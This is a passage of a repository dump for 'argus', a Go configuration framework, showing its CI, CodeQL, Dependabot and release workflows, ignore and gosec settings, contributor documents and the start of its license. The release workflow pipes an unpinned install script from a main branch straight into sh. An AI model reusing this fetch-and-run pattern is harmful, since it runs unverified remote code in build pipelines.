# agilira/argus (main)
```
├── .codecov.yml (100 tokens)
├── .github/
   ├── codeql/
      ├── codeql-config.yml (300 tokens)
   ├── dependabot.yml (200 tokens)
   ├── workflows/
      ├── ci.yml (500 tokens)
      ├── codeql.yml (200 tokens)
      ├── dependabot-auto-merge.yml (400 tokens)
      ├── pr.yml (200 tokens)
      ├── release.yml (600 tokens)
├── .gitignore (300 tokens)
├── .gosec.json
├── CODE_OF_CONDUCT.md (1100 tokens)
├── CONTRIBUTING.md (600 tokens)
├── LICENSE.md (3.4k tokens)
├── Makefile (1300 tokens)
├── Makefile.ps1 (2.5k tokens)
├── README.md (2.3k tokens)
├── SECURITY.md (200 tokens)
├── argus.go (8.9k tokens)
├── argus_core_test.go (3.8k tokens)
├── argus_edge_test.go (900 tokens)
├── argus_fuzz_test.go (4.6k tokens)
├── argus_security_test.go (7.2k tokens)
├── argus_test.go (3.5k tokens)
├── argus_unit_test.go (41.4k tokens)
├── assets/
   ├── banner.png
├── audit.go (1800 tokens)
├── audit_backend.go (6k tokens)
├── audit_backend_test.go (11.3k tokens)
├── audit_test.go (1300 tokens)
├── benchmark_test.go (1600 tokens)
├── benchmarks/
   ├── README.md (700 tokens)
   ├── go.mod (100 tokens)
   ├── go.sum (100 tokens)
   ├── performance-report-20251016.txt (400 tokens)
   ├── ring_buffer_performance_test.go (1100 tokens)
├── boreaslite.go (3.7k tokens)
├── boreaslite_strategies_test.go (1300 tokens)
├── boreaslite_test.go (1500 tokens)
├── build.ps1 (500 tokens)
├── build.sh (500 tokens)
├── changelog/
   ├── v1.0.0.txt (1500 tokens)
   ├── v1.0.1.txt (1900 tokens)
   ├── v1.0.2.txt (2.5k tokens)
   ├── v1.0.3.txt (300 tokens)
   ├── v1.0.4.txt (800 tokens)
   ├── v1.0.5.txt (1100 tokens)
   ├── v1.0.6.txt (1300 tokens)
   ├── v1.0.7.txt (600 tokens)
├── clean_overhead_test.go (600 tokens)
├── cmd/
   ├── cli/
      ├── cli_commands_test.go (2.2k tokens)
      ├── cli_handle_test.go (4.4k tokens)
      ├── cli_integration_test.go (4.7k tokens)
      ├── handlers.go (3.2k tokens)
      ├── manager.go (1400 tokens)
      ├── manager_test.go (1200 tokens)
      ├── utils.go (1300 tokens)
├── config.go (1100 tokens)
├── config_binder.go (1900 tokens)
├── config_binder_test.go (3.6k tokens)
├── config_equals_test.go (900 tokens)
├── config_format_test.go (1500 tokens)
├── config_test.go (200 tokens)
├── config_validation.go (2.9k tokens)
├── config_validation_security_test.go (2.2k tokens)
├── config_validation_simple_test.go (300 tokens)
├── config_validation_test.go (3.5k tokens)
├── config_writer.go (6.5k tokens)
├── config_writer_comprehensive_test.go (1600 tokens)
├── config_writer_test.go (4.3k tokens)
├── doc.go (2.6k tokens)
├── docs/
   ├── API-REFERENCE.md (8.1k tokens)
   ├── ARCHITECTURE.md (3.1k tokens)
   ├── architecture-spinning-logic.md (2000 tokens)
   ├── audit-system.md (6.6k tokens)
   ├── cli-integration.md (2.4k tokens)
   ├── environment-config.md (2.3k tokens)
   ├── integrations.md (2.8k tokens)
   ├── parser-guide.md (2.4k tokens)
   ├── provider-tutorial.md (4.3k tokens)
   ├── quick-start.md (2.5k tokens)
   ├── remote-config-api.md (2.4k tokens)
├── env_config.go (4.6k tokens)
├── env_config_test.go (5.7k tokens)
├── error_handler_test.go (2k tokens)
├── examples/
   ├── cli/
      ├── README.md (1300 tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (200 tokens)
      ├── main.go (100 tokens)
      ├── main_test.go (1200 tokens)
   ├── config_binding/
      ├── README.md (800 tokens)
      ├── config_binding_test.go (2.3k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1000 tokens)
   ├── config_validation/
      ├── README.md (200 tokens)
      ├── config_validation_test.go (2.7k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1300 tokens)
   ├── error_handling/
      ├── README.md (800 tokens)
      ├── error_handling_test.go (2.6k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1600 tokens)
   ├── multi_source_config/
      ├── README.md (1000 tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1500 tokens)
      ├── main_test.go (3k tokens)
   ├── optimization_strategies/
      ├── README.md (300 tokens)
      ├── benchmark_test.go (3.3k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── integration_test.go (2.9k tokens)
      ├── main.go (1400 tokens)
      ├── main_test.go (4.4k tokens)
   ├── otel_integration/
      ├── README.md (2.2k tokens)
      ├── go.mod (200 tokens)
      ├── go.sum (700 tokens)
      ├── main.go (800 tokens)
      ├── main_test.go (2.2k tokens)
      ├── otel.go (900 tokens)
      ├── otel_test.go (2k tokens)
├── go.mod (100 tokens)
├── go.sum (200 tokens)
├── graceful_shutdown_features_test.go (2k tokens)
├── graceful_shutdown_test.go (2000 tokens)
├── hcl_validation.go (300 tokens)
├── ini_validation.go (500 tokens)
├── ini_validation_test.go (400 tokens)
├── integration.go (2.2k tokens)
├── integration_test.go (3.6k tokens)
├── long_path_test.go (1000 tokens)
├── low_file_test.go (800 tokens)
├── no_consumer_test.go (300 tokens)
├── overhead-benchmarks/
   ├── README.md (400 tokens)
   ├── go.mod (100 tokens)
   ├── go.sum (100 tokens)
   ├── realistic_production_overhead_test.go (1500 tokens)
   ├── theoretical_minimal_overhead_test.go (600 tokens)
├── overhead_analysis_test.go (1500 tokens)
├── parser_robustness_test.go (1900 tokens)
├── parser_structured.go (4.1k tokens)
├── parser_text.go (1700 tokens)
├── parser_yaml_comprehensive_test.go (800 tokens)
├── parser_yaml_improvement_test.go (1000 tokens)
├── parser_yaml_nested_test.go (800 tokens)
├── parsers.go (1900 tokens)
├── path_limits_test.go (500 tokens)
├── plugin_system_test.go (1000 tokens)
├── production_overhead_test.go (1900 tokens)
├── properties_validation.go (400 tokens)
├── properties_validation_test.go (400 tokens)
├── realistic_benchmark_test.go (1200 tokens)
├── remote_config.go (3.8k tokens)
├── remote_config_fallback.go (2.6k tokens)
├── remote_config_fallback_test.go (4.6k tokens)
├── security_critical_test.go (1000 tokens)
├── simple_set_test.go (300 tokens)
├── single_event_bench_test.go (500 tokens)
├── utilities.go (1400 tokens)
├── utilities_comprehensive_test.go (5.7k tokens)
├── utilities_test.go (1700 tokens)
```


## /.codecov.yml

```yml path="/.codecov.yml" 
coverage:
  status:
    project:
      default:
        target: 70%
        threshold: 2%
    patch:
      default:
        target: auto
        threshold: 2%

comment:
  layout: "reach, diff, flags, files"
  behavior: default

ignore:
  - "**/*_test.go"
  - "examples/**"
  - "cmd/**"

```

## /.github/codeql/codeql-config.yml

```yml path="/.github/codeql/codeql-config.yml" 
# CodeQL Configuration for Argus Configuration Framework
# Focuses on configuration security, path traversal, and injection vulnerabilities

name: argus-configuration-security

# Keep the default query suite enabled alongside the security-focused extras below
disable-default-queries: false

# Include additional security queries relevant to configuration frameworks
queries:
  - uses: security-and-quality
  - uses: security-experimental
  
# Define custom paths for analysis
paths:
  - "**/*.go"

# Ignore test files and dependencies (focus on production code)
paths-ignore:
  - "**/*_test.go"
  - "**/testdata/**"
  - "**/vendor/**"
  - "**/examples/**"

# Packs for enhanced configuration security analysis
packs:
  - "codeql/go-queries"
  - "codeql/go-queries:AlertSuppression.ql"
  - "codeql/go-queries:Security"

# Query filters for configuration frameworks
query-filters:
  - include:
      id: go/path-injection
      # Critical for configuration file handling
  - include:
      id: go/zipslip
      # Important for archive handling in configs
  - exclude:
      id: go/unused-variable
      # Configuration structs may have unused fields for future compatibility
      
# Custom extraction configuration for Go configuration analysis
extractor-config:
  go:
    # Enable deep analysis for configuration handling functions
    index:
      filters:
        - include: "**/*.go"
        - exclude: "*_test.go"
    build_command: "go build ./..."
    
# Performance tuning for configuration framework analysis
compilation-cache: true
```

## /.github/dependabot.yml

```yml path="/.github/dependabot.yml" 
# AGILira Standard Dependabot Configuration
# Copy this file to .github/dependabot.yml in your project root

version: 2
updates:
  # Enable version updates for Go modules
  - package-ecosystem: "gomod"
    # Look for go.mod in the root directory
    directory: "/"
    # Check for updates daily
    schedule:
      interval: "daily"
      time: "09:00"
      timezone: "Europe/Rome"
    # Group updates to reduce PR noise
    groups:
      agilira:
        patterns:
          - "github.com/agilira/*"
      golang:
        patterns:
          - "golang.org/x/*"
      testing:
        patterns:
          - "github.com/stretchr/testify"
          - "github.com/go-test/*"
    # Auto-merge minor and patch updates for trusted dependencies
    open-pull-requests-limit: 5
    reviewers:
      - "agilira"
    assignees:
      - "agilira"
    commit-message:
      prefix: "[chore]"
      include: "scope"
```

## /.github/workflows/ci.yml

```yml path="/.github/workflows/ci.yml" 
name: CI/CD

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]

env:
  CGO_ENABLED: 1

jobs:
  test:
    name: Test Suite
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: 'stable'
        cache: true

    - name: Install Dependencies
      run: |
        go install honnef.co/go/tools/cmd/staticcheck@latest
        go install github.com/securego/gosec/v2/cmd/gosec@latest
        go install golang.org/x/vuln/cmd/govulncheck@latest

    - name: Go Format Check
      run: |
        if [ "$(gofmt -l . | wc -l)" -gt 0 ]; then
          echo "Code not formatted:"
          gofmt -l .
          exit 1
        fi

    - name: Module Verification
      run: go mod verify

    - name: Go Vet
      run: go vet ./...

    - name: Staticcheck
      run: staticcheck ./...

    - name: Vulnerability Check
      run: govulncheck ./...

    - name: Security Scan (gosec)
      continue-on-error: true
      run: |
        echo "Running security scan..."
        gosec -conf .gosec.json ./... || true
        echo "Security scan completed"

    - name: Test with Race Detection
      run: go test -race -timeout 5m -v ./...

    - name: Test Coverage
      run: |
        go test -coverprofile=coverage.out ./...
        go tool cover -func=coverage.out

    - name: Upload coverage to Codecov
      uses: codecov/codecov-action@v4
      with:
        file: ./coverage.out
        flags: unittests
        name: codecov-umbrella
        fail_ci_if_error: false

  build:
    name: Build Matrix
    runs-on: ${{ matrix.os }}
    continue-on-error: ${{ matrix.os == 'macos-latest' }}
    strategy:
      fail-fast: false
      matrix:
        os: [ubuntu-latest, windows-latest, macos-latest]
        go-version: ['stable']  # Reduced to save minutes
        include:
          - os: macos-latest
            timeout: 5  # Shorter timeout for macOS due to runner availability issues
    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: ${{ matrix.go-version }}
        cache: true

    - name: Build
      run: go build -v ./...
      timeout-minutes: ${{ matrix.timeout || 15 }}

    - name: Short Test (no race, faster)
      run: go test -short -timeout 5m ./...
      timeout-minutes: ${{ matrix.timeout || 15 }}

```

## /.github/workflows/codeql.yml

```yml path="/.github/workflows/codeql.yml" 
name: "CodeQL"

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]
  schedule:
    - cron: '0 2 * * 0'

jobs:
  analyze:
    name: Analyze
    runs-on: ubuntu-latest
    timeout-minutes: 360
    permissions:
      actions: read
      contents: read
      security-events: write

    strategy:
      fail-fast: false
      matrix:
        language: [ 'go' ]

    steps:
    - name: Checkout repository
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: 'stable'

    - name: Initialize CodeQL
      uses: github/codeql-action/init@v3
      with:
        languages: ${{ matrix.language }}
        config-file: ./.github/codeql/codeql-config.yml

    - name: Run govulncheck
      run: |
        go install golang.org/x/vuln/cmd/govulncheck@latest
        govulncheck ./...

    - name: Perform CodeQL Analysis
      uses: github/codeql-action/analyze@v3
      with:
        category: "/language:${{matrix.language}}"

```

## /.github/workflows/dependabot-auto-merge.yml

```yml path="/.github/workflows/dependabot-auto-merge.yml" 
name: Dependabot PR Auto-Merge

on:
  pull_request:
    types: [opened, synchronize, reopened]

jobs:
  dependabot-auto-merge:
    runs-on: ubuntu-latest
    if: github.actor == 'dependabot[bot]'
    steps:
      - name: Checkout code
        uses: actions/checkout@v5
        with:
          fetch-depth: 0

      - name: Set up Go
        uses: actions/setup-go@v5
        with:
          go-version: 'stable'

      - name: Cache Go modules
        uses: actions/cache@v4
        with:
          path: |
            ~/.cache/go-build
            ~/go/pkg/mod
          key: ${{ runner.os }}-go-${{ hashFiles('**/go.sum') }}
          restore-keys: |
            ${{ runner.os }}-go-

      - name: Run tests
        run: |
          go mod download
          go test -v ./...

      - name: Check if PR can be auto-merged
        id: auto-merge-check
        run: |
          # Check if this is a patch/minor update (not major)
          if echo "${{ github.event.pull_request.title }}" | grep -E "(patch|minor|deps\()" > /dev/null; then
            echo "can_auto_merge=true" >> $GITHUB_OUTPUT
          else
            echo "can_auto_merge=false" >> $GITHUB_OUTPUT
          fi

      - name: Enable auto-merge for Dependabot PRs
        if: steps.auto-merge-check.outputs.can_auto_merge == 'true'
        run: |
          gh pr merge --auto --squash "${{ github.event.pull_request.number }}"
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Add comment for manual review
        if: steps.auto-merge-check.outputs.can_auto_merge == 'false'
        run: |
          gh pr comment "${{ github.event.pull_request.number }}" --body "**Manual Review Required**
          
          This appears to be a major version update that requires manual review.
          Please verify:
          - [ ] Breaking changes documentation
          - [ ] Compatibility with existing code
          - [ ] Performance impact
          - [ ] Security implications
          
          After review, manually merge when ready."
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

```
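The title heuristic in the `auto-merge-check` step above can be exercised locally. A small sketch using the same regex (the sample PR titles are hypothetical):

```shell
#!/bin/sh
# Same pattern as the workflow's auto-merge-check step:
# titles mentioning "patch", "minor", or "deps(" are auto-merge candidates.
classify() {
  if echo "$1" | grep -E "(patch|minor|deps\()" > /dev/null; then
    echo "auto"
  else
    echo "manual"
  fi
}

classify "bump minor version of golang.org/x/text"  # contains "minor"
classify "Bump foo to v2.0.0"                       # no match: manual review
```

Note that the pattern matches on wording only; a major bump whose title happens to contain "patch" would still be auto-merged, which is why the workflow also runs the full test suite first.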

## /.github/workflows/pr.yml

```yml path="/.github/workflows/pr.yml" 
name: PR Quick Check

on:
  pull_request:
    branches: [ main ]

env:
  CGO_ENABLED: 1

jobs:
  quick-test:
    name: Quick Validation
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: 'stable'
        cache: true

    - name: Quick Quality Check
      run: |
        # Format check
        test -z "$(gofmt -l .)"
        
        # Vet
        go vet ./...
        
        # Basic test
        go test -short ./...

    - name: Install Security Tools
      run: go install github.com/securego/gosec/v2/cmd/gosec@latest

    - name: Security Scan
      run: |
        # Only scan the main module and cmd, exclude examples and benchmarks with separate go.mod
        gosec --exclude=G104,G306,G301 \
          --exclude-dir=examples \
          --exclude-dir=benchmarks \
          --exclude-dir=overhead-benchmarks \
          ./ ./cmd/...

```

## /.github/workflows/release.yml

```yml path="/.github/workflows/release.yml" 
name: Release

on:
  push:
    tags:
      - 'v*'

permissions:
  contents: write
  id-token: write
  attestations: write

jobs:
  release:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v4
      with:
        fetch-depth: 0

    - name: Set up Go
      uses: actions/setup-go@v5
      with:
        go-version: '1.24'

    - name: Install development tools
      run: make tools

    - name: Run tests
      run: make test

    - name: Run security checks
      run: make security

    - name: Build artifacts
      run: |
        mkdir -p dist
        
        # Build Argus CLI for multiple platforms
        GOOS=linux GOARCH=amd64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-linux-amd64 .
        GOOS=linux GOARCH=arm64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-linux-arm64 .
        GOOS=darwin GOARCH=amd64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-darwin-amd64 .
        GOOS=darwin GOARCH=arm64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-darwin-arm64 .
        GOOS=windows GOARCH=amd64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-windows-amd64.exe .
        
        # Create checksums
        cd dist
        sha256sum * > checksums.txt

    - name: Generate build provenance attestation
      uses: actions/attest-build-provenance@v1
      with:
        subject-path: 'dist/*'

    - name: Generate SBOM
      run: |
        # Generate SBOM from Go modules using syft
        curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin
        /usr/local/bin/syft . -o spdx-json=sbom.json
        
    - name: Generate SBOM attestation  
      uses: actions/attest-sbom@v1
      with:
        subject-path: 'dist/*'
        sbom-path: 'sbom.json'

    - name: Create Release
      uses: softprops/action-gh-release@v2
      with:
        files: |
          dist/*
        body: |
          ## Argus ${{ github.ref_name }}
          
          Dynamic configuration framework for Go applications with zero-allocation performance, universal format support, and ultra-fast CLI.
          
          ### Installation
          
          **Library:**
          \`\`\`bash
          go get github.com/agilira/argus@${{ github.ref_name }}
          \`\`\`
          
          **CLI Binary:**
          Download the appropriate binary for your platform from the attachments below.
          
          ### CLI Usage
          \`\`\`bash
          # Configuration management
          ./argus config get config.yaml server.port
          ./argus config set config.yaml database.host localhost
          ./argus config convert config.yaml config.json
          ./argus watch config.yaml --interval=1s
          \`\`\`
          
          ### Verification
          Verify release authenticity using GitHub CLI:
          \`\`\`bash
          gh attestation verify ./argus-* --owner agilira
          \`\`\`
          
          ### Changes
          See [changelog/${{ github.ref_name }}.txt](https://github.com/agilira/argus/blob/main/changelog/${{ github.ref_name }}.txt) for details.
        generate_release_notes: true
        draft: false
        prerelease: false
```
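The five `go build` invocations in the release job differ only in target platform. The same matrix can be expressed as a loop; the sketch below prints the commands with `echo` rather than running them, so it is illustrative only:

```shell
#!/bin/sh
# Dry-run sketch: print the release build command for each GOOS/GOARCH pair.
for target in linux/amd64 linux/arm64 darwin/amd64 darwin/arm64 windows/amd64; do
  GOOS=${target%/*}
  GOARCH=${target#*/}
  out="dist/argus-${GOOS}-${GOARCH}"
  # Windows binaries get the .exe suffix, as in the workflow above.
  [ "$GOOS" = "windows" ] && out="${out}.exe"
  echo "GOOS=$GOOS GOARCH=$GOARCH go build -ldflags='-w -s -buildid=' -trimpath -o $out ."
done
```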

## /.gitignore

```gitignore path="/.gitignore" 
# Binaries for programs and plugins
*.exe
*.exe~
*.dll
*.so
*.dylib

# Test binary, built with `go test -c`
*.test

# Output of the go coverage tool, specifically when used with LiteIDE
*.out

# Dependency directories
vendor/

# Go workspace file
go.work

# IDE and editor files
.vscode/
.idea/
*.swp
*.swo
*~

# OS generated files
.DS_Store
.DS_Store?
._*
.Spotlight-V100
.Trashes
ehthumbs.db
Thumbs.db

# Temporary files
tmp/
temp/
*.tmp
*.temp

# Log files
*.log
logs/

# Coverage reports
coverage.out
c.out

# Benchmark results
*.bench

# Performance profiles
*.prof
*.pprof

# Build artifacts
dist/
build/

# Environment files
.env
.env.local
.env.*.local

# Certificate files (for testing)
*.pem
*.key
*.crt

# Configuration files that might contain secrets
config.local.*
*secret*
*private*

# Argus specific
# Audit files (if they contain sensitive data)
audit_*.log
# Test configuration files
test_config.*
# Temporary test directories
argus_test_*
argus_universal_test_*

# Dev specific files and folders
chaos_test.go
deadlock_stress_test.go
extreme_deadlock_test.go
features_verification_test.go
production_test.go
rigorous_test.go
ROADMAP.md
stress_test.go
ultimate_deadlock_test.go
validation_strategy.md
realistic_benchmark_test.go
scalability_test.go
tests/
production_overhead_test.go
capacity_test.txt
features_verification_test.txt

# Goroutine leak detection tools (development only)
test_helper.go
goroutine_leak_test.go

# Demo and recording files (for development/recording only)
demo-script.sh
argus-demo.cast
RECORDING.md
*.cast
*-demo.sh
benchmark-demo.sh

# CLI binary (built from examples/cli)
argus
```

## /.gosec.json

```json path="/.gosec.json" 
{
  "excludes": [
    "G104",
    "G306", 
    "G301"
  ],
  "exclude-generated": true,
  "exclude-dirs": [
    "examples",
    "vendor",
    ".git"
  ],
  "severity": "medium",
  "confidence": "medium",
  "fmt": "text"
}

```

## /CODE_OF_CONDUCT.md

# Contributor Covenant Code of Conduct

## Our Pledge

We as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.

We pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community.

## Our Standards

Examples of behavior that contributes to a positive environment for our community include:

- Demonstrating empathy and kindness toward other people
- Being respectful of differing opinions, viewpoints, and experiences
- Giving and gracefully accepting constructive feedback
- Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience
- Focusing on what is best not just for us as individuals, but for the overall community

Examples of unacceptable behavior include:

- The use of sexualized language or imagery, and sexual attention or advances of any kind
- Trolling, insulting or derogatory comments, and personal or political attacks
- Public or private harassment
- Publishing others’ private information, such as a physical or email address, without their explicit permission
- Other conduct which could reasonably be considered inappropriate in a professional setting

## Enforcement Responsibilities

Community leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful.

Community leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate.

## Scope

This Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces. Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at github@agilira.com. All complaints will be reviewed and investigated promptly and fairly.

All community leaders are obligated to respect the privacy and security of the reporter of any incident.

## Enforcement Guidelines

Community leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct:

### 1. Correction

**Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community.

**Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested.

### 2. Warning

**Community Impact**: A violation through a single incident or series of actions.

**Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban.

### 3. Temporary Ban

**Community Impact**: A serious violation of community standards, including sustained inappropriate behavior.

**Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban.

### 4. Permanent Ban

**Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals.

**Consequence**: A permanent ban from any sort of public interaction within the community.

## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 2.1, available at [https://www.contributor-covenant.org/version/2/1/code_of_conduct.html](https://www.contributor-covenant.org/version/2/1/code_of_conduct.html).

Community Impact Guidelines were inspired by [Mozilla’s code of conduct enforcement ladder](https://github.com/mozilla/diversity).

For answers to common questions about this code of conduct, see the FAQ at [https://www.contributor-covenant.org/faq](https://www.contributor-covenant.org/faq). Translations are available at [https://www.contributor-covenant.org/translations](https://www.contributor-covenant.org/translations).

[homepage]: https://www.contributor-covenant.org


## /CONTRIBUTING.md

# Contributing to Argus

First, thank you for considering contributing to Argus. We appreciate the time and effort you are willing to invest. This document outlines the guidelines for contributing to the project to ensure a smooth and effective process for everyone involved.

## How to Contribute

We welcome contributions in various forms, including:
- Reporting bugs
- Suggesting enhancements
- Improving documentation
- Submitting code changes

### Reporting Bugs

If you encounter a bug, please open an issue on our GitHub repository. A well-documented bug report is crucial for a swift resolution. Please include the following information:

- **Go Version**: The output of `go version`.
- **Operating System**: Your OS and version (e.g., Ubuntu 22.04, macOS 12.6).
- **Clear Description**: A concise but detailed description of the bug.
- **Steps to Reproduce**: A minimal, reproducible example that demonstrates the issue. This could be a small Go program.
- **Expected vs. Actual Behavior**: What you expected to happen and what actually occurred.
- **Logs or Error Messages**: Any relevant logs or error output, formatted as code blocks.

### Suggesting Enhancements

If you have an idea for a new feature or an improvement to an existing one, please open an issue to start a discussion. This allows us to align on the proposal before any significant development work begins.

## Development Process

1.  **Fork the Repository**: Start by forking the main argus repository to your own GitHub account.
2.  **Clone Your Fork**: Clone your forked repository to your local machine.
    ```bash
    git clone https://github.com/YOUR_USERNAME/argus.git
    cd argus
    ```
3.  **Create a Branch**: Create a new branch for your changes. Use a descriptive name (e.g., `fix/....` or `feature/....`).
    ```bash
    git checkout -b your-branch-name
    ```
4.  **Make Changes**: Write your code. Ensure your code adheres to Go's best practices.
5.  **Format Your Code**: Run `gofmt` to ensure your code is correctly formatted.
    ```bash
    gofmt -w .
    ```
6.  **Add Tests**: If you are adding a new feature or fixing a bug, please add corresponding unit or integration tests. All tests must pass.
    ```bash
    go test ./...
    ```
7.  **Commit Your Changes**: Use a clear and descriptive commit message.
    ```bash
    git commit -m "feat: Add support for XYZ feature"
    ```
8.  **Push to Your Fork**: Push your changes to your forked repository.
    ```bash
    git push origin your-branch-name
    ```
9.  **Open a Pull Request**: Open a pull request from your branch to the `main` branch of the official argus repository. Provide a clear title and description for your PR, referencing any related issues.

## Pull Request Guidelines

- **One PR per Feature**: Each pull request should address a single bug or feature.
- **Clear Description**: Explain the "what" and "why" of your changes.
- **Passing Tests**: Ensure that the full test suite passes.
- **Documentation**: If your changes affect public APIs or behavior, update the relevant documentation (in-code comments, `README.md`, or files in the `docs/` directory).

Thank you for helping make Argus better!

---

Argus • an AGILira fragment


## /LICENSE.md

Copyright (c) 2025 AGILira - A. Giordano

Mozilla Public License Version 2.0
==================================

1. Definitions
--------------

1.1. "Contributor"
    means each individual or legal entity that creates, contributes to
    the creation of, or owns Covered Software.

1.2. "Contributor Version"
    means the combination of the Contributions of others (if any) used
    by a Contributor and that particular Contributor's Contribution.

1.3. "Contribution"
    means Covered Software of a particular Contributor.

1.4. "Covered Software"
    means Source Code Form to which the initial Contributor has attached
    the notice in Exhibit A, the Executable Form of such Source Code
    Form, and Modifications of such Source Code Form, in each case
    including portions thereof.

1.5. "Incompatible With Secondary Licenses"
    means

    (a) that the initial Contributor has attached the notice described
        in Exhibit B to the Covered Software; or

    (b) that the Covered Software was made available under the terms of
        version 1.1 or earlier of the License, but not also under the
        terms of a Secondary License.

1.6. "Executable Form"
    means any form of the work other than Source Code Form.

1.7. "Larger Work"
    means a work that combines Covered Software with other material, in
    a separate file or files, that is not Covered Software.

1.8. "License"
    means this document.

1.9. "Licensable"
    means having the right to grant, to the maximum extent possible,
    whether at the time of the initial grant or subsequently, any and
    all of the rights conveyed by this License.

1.10. "Modifications"
    means any of the following:

    (a) any file in Source Code Form that results from an addition to,
        deletion from, or modification of the contents of Covered
        Software; or

    (b) any new file in Source Code Form that contains any Covered
        Software.

1.11. "Patent Claims" of a Contributor
    means any patent claim(s), including without limitation, method,
    process, and apparatus claims, in any patent Licensable by such
    Contributor that would be infringed, but for the grant of the
    License, by the making, using, selling, offering for sale, having
    made, import, or transfer of either its Contributions or its
    Contributor Version.

1.12. "Secondary License"
    means either the GNU General Public License, Version 2.0, the GNU
    Lesser General Public License, Version 2.1, the GNU Affero General
    Public License, Version 3.0, or any later versions of those
    licenses.

1.13. "Source Code Form"
    means the form of the work preferred for making modifications.

1.14. "You" (or "Your")
    means an individual or a legal entity exercising rights under this
    License. For legal entities, "You" includes any entity that
    controls, is controlled by, or is under common control with You. For
    purposes of this definition, "control" means (a) the power, direct
    or indirect, to cause the direction or management of such entity,
    whether by contract or otherwise, or (b) ownership of more than
    fifty percent (50%) of the outstanding shares or beneficial
    ownership of such entity.

2. License Grants and Conditions
--------------------------------

2.1. Grants

Each Contributor hereby grants You a world-wide, royalty-free,
non-exclusive license:

(a) under intellectual property rights (other than patent or trademark)
    Licensable by such Contributor to use, reproduce, make available,
    modify, display, perform, distribute, and otherwise exploit its
    Contributions, either on an unmodified basis, with Modifications, or
    as part of a Larger Work; and

(b) under Patent Claims of such Contributor to make, use, sell, offer
    for sale, have made, import, and otherwise transfer either its
    Contributions or its Contributor Version.

2.2. Effective Date

The licenses granted in Section 2.1 with respect to any Contribution
become effective for each Contribution on the date the Contributor first
distributes such Contribution.

2.3. Limitations on Grant Scope

The licenses granted in this Section 2 are the only rights granted under
this License. No additional rights or licenses will be implied from the
distribution or licensing of Covered Software under this License.
Notwithstanding Section 2.1(b) above, no patent license is granted by a
Contributor:

(a) for any code that a Contributor has removed from Covered Software;
    or

(b) for infringements caused by: (i) Your and any other third party's
    modifications of Covered Software, or (ii) the combination of its
    Contributions with other software (except as part of its Contributor
    Version); or

(c) under Patent Claims infringed by Covered Software in the absence of
    its Contributions.

This License does not grant any rights in the trademarks, service marks,
or logos of any Contributor (except as may be necessary to comply with
the notice requirements in Section 3.4).

2.4. Subsequent Licenses

No Contributor makes additional grants as a result of Your choice to
distribute the Covered Software under a subsequent version of this
License (see Section 10.2) or under the terms of a Secondary License (if
permitted under the terms of Section 3.3).

2.5. Representation

Each Contributor represents that the Contributor believes its
Contributions are its original creation(s) or it has sufficient rights
to grant the rights to its Contributions conveyed by this License.

2.6. Fair Use

This License is not intended to limit any rights You have under
applicable copyright doctrines of fair use, fair dealing, or other
equivalents.

2.7. Conditions

Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted
in Section 2.1.

3. Responsibilities
-------------------

3.1. Distribution of Source Form

All distribution of Covered Software in Source Code Form, including any
Modifications that You create or to which You contribute, must be under
the terms of this License. You must inform recipients that the Source
Code Form of the Covered Software is governed by the terms of this
